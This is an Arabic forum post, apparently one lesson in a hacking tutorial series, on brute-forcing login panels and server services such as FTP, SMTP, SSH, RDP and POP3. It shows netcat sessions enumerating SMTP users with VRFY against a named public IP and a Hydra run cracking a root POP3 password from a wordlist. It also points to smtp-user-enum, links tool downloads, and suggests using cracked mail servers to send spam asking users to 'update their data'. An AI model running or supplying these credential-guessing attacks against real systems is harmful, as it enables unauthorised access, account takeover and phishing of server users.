اليوم شرحنا عن التخمين على اى لوحة دخول و التخمين على خدمات السيرفرات مثل
ftp & SMTP & ssh & rdp
طيب بالشرح ستجد كل الخدمات الى قلنا عليها لكن بنوضح شىء بسبب طول الفيديو ما سمح ,,
اعزرونى اطول بالشرح لانى احبكم فى الله
طيب نوضح شىء فقط بسيط فى خدمة ال SMTP و هى تستخدم لارسال رسائل
الى البريد مثل الجيميل و الهوت و الياهو و غيرهم
طيب البورت المخصص للخدمة دى هو 25
و توجد برامج ايضا pop3 و imap و غيرهم يمكن تثبيتهم بالسيرفرات
و منهم يمكن تكريكهم و الاتصال بهم و ارسال رسائل سبام انبوكس الى المستخدمين
على السرفر مثلا لتحديث بيااناتهم (ستشرح لاحقا)
طيب ممكن تتصل بالسيرفر عن طريق النت كات
nc -vn 173.194.40.86 25
تمام الان نرسل امر
VRFY ahmed
و احمد هنا هو المستخدم المطلوب معرفته على السيرفر ام لا ,,
كود PHP:
bt # nc -nv 173.194.40.86 25
(UNKNOWN) [173.194.40.86] 25 (smtp) open
220 smtp.google.com ESMTP Sendmail 8.13.7/8.13.7; 24-05-2013 14:53:15 +0200
VRFY ahmed
550 5.2 ahmed... User unknown
VRFY root
250 2.1 root <root@smtp.google.com>
VRFY testwwwwwwwwwwwwwww
550 5.2 test... testwwwwwwwwwwwwwww unknown
punt!
bt #
و ايضا ممكن التخمين على الخدمات الاخرى يكون كالتالى ,,
كود PHP:
root@bt:~# hydra -l root -P passwords.txt -v 192.168.0.112 pop3
Hydra v5.3 (c) 2013 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 27-05.2013 16:44:44
[DATA] 16 tasks, 1 servers, 22 login tries (l:1/p:22), ~1 tries per task
[DATA] attacking service pop3 on port 110
[VERBOSE] Resolving addresses ... done
[110][pop3] host: 192.168.0.112 login: root password: password
[VERBOSE] Skipping current login as we cracked it
[STATUS] attack finished for 192.168.0.112 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 27-05-2013 16:44:49
root@bt:~#
طيب يمكن استخدام اداه الـ SMTP enum فى المسار التالى
كود PHP:
/pentest/eneumeration/smtp/smtp-user-enum
و تعمل تكست بة يوزرات الى تشوفهم موجودين ام لا و يفضل يكون info او contact او support
و تشغيلها كالتالى لجلب اليوزرات
![[الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp 765487939](https://2img.net/h/www7.0zz0.com/2013/05/28/13/765487939.png)
![[الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp 419953572](https://2img.net/h/www7.0zz0.com/2013/05/28/13/419953572.png)
![[الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp 404009546](https://2img.net/h/www7.0zz0.com/2013/05/28/13/404009546.png)
و يمكن التخمين على ال snmp و ال vnc و غيرهم ,,
فقط عليك متابعه الشرح و التطبيق ,,
و الان مع الشرح يمكنك تحميله من هنا ,,
كود PHP:
http://www.mediafire.com/download/ppl195d5lcg6scj/WP-JOO-rdp-ftp-ssh-smtp.rar و لتحميل اداه الهيدرا للويندوز من هنا
كود PHP:
http://www.mediafire.com/download/13q5err9vsfnekh/hydra-6.0-windows.zip و باقى الادوات مرفقة
والله الموفق و المستعان ,,
اى استفساار برجاء وضعه بموضوع الاستفسارات ,,
بالتوفيق ,,
![[الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp Empty](https://2img.net/i/empty.gif)
موضوع: [الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp ![[الشرح الثامن عشر] شرح التخمين على اى لوحة دخول و ftp ssh smtp rdp Icon_minitime](https://2img.net/i/fa/icon_minitime.gif){kind=icon}
الثلاثاء يوليو 23, 2013 8:28 am
